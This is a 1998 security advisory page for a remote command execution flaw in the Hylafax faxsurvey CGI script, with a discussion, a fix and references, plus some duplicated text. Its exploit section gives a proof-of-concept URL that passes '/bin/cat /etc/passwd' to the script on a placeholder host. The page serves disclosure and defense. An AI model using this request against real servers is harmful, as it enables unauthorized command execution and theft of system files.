Hylafax Faxsurvey Remote Command Execution Vulnerability
BID:2056
Info
Hylafax Faxsurvey Remote Command Execution Vulnerability
| Bugtraq ID: | 2056 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | Yes |
| Published: | Aug 04 1998 12:00AM |
| Updated: | Aug 04 1998 12:00AM |
| Credit: | Posted to BugTraq on August 4, 1998 by Tom < [email protected] > |
| Vulnerable: |
Hylafax Hylafax 4.0 pl2 |
| Not Vulnerable: | |
Discussion
Hylafax Faxsurvey Remote Command Execution Vulnerability
Hylafax is a popular fax server software package designed to run on multiple UNIX operating systems. Unpatched version of Hylafax ship with an insecure script, faxsurvey, which allows remote command execution with the privileges of the web server process. This can be exploited simply by passing the command as a parameter to the script - see exploit. Consequences could include web site defacements, exploiting locally accessible vulnerabilities to gain further privileges, etc.
Hylafax is a popular fax server software package designed to run on multiple UNIX operating systems. Unpatched version of Hylafax ship with an insecure script, faxsurvey, which allows remote command execution with the privileges of the web server process. This can be exploited simply by passing the command as a parameter to the script - see exploit. Consequences could include web site defacements, exploiting locally accessible vulnerabilities to gain further privileges, etc.
Exploit / POC
Hylafax Faxsurvey Remote Command Execution Vulnerability
http://target.host/cgi-bin/faxsurvey?/bin/cat%20/etc/passwd
http://target.host/cgi-bin/faxsurvey?/bin/cat%20/etc/passwd
Solution / Fix
Hylafax Faxsurvey Remote Command Execution Vulnerability
Solution:
Disable the affected script and/or upgrade to a newer version of Hylafax.
Hylafax Hylafax 4.0 pl2
Solution:
Disable the affected script and/or upgrade to a newer version of Hylafax.
Hylafax Hylafax 4.0 pl2
-
Hylafax security-patch.sh
http://www.hylafax.org/patches/security-patch.sh
References
Hylafax Faxsurvey Remote Command Execution Vulnerability
References:
References:
- Hylafax Homepage (Hylafax)
- Patches (Hylafax)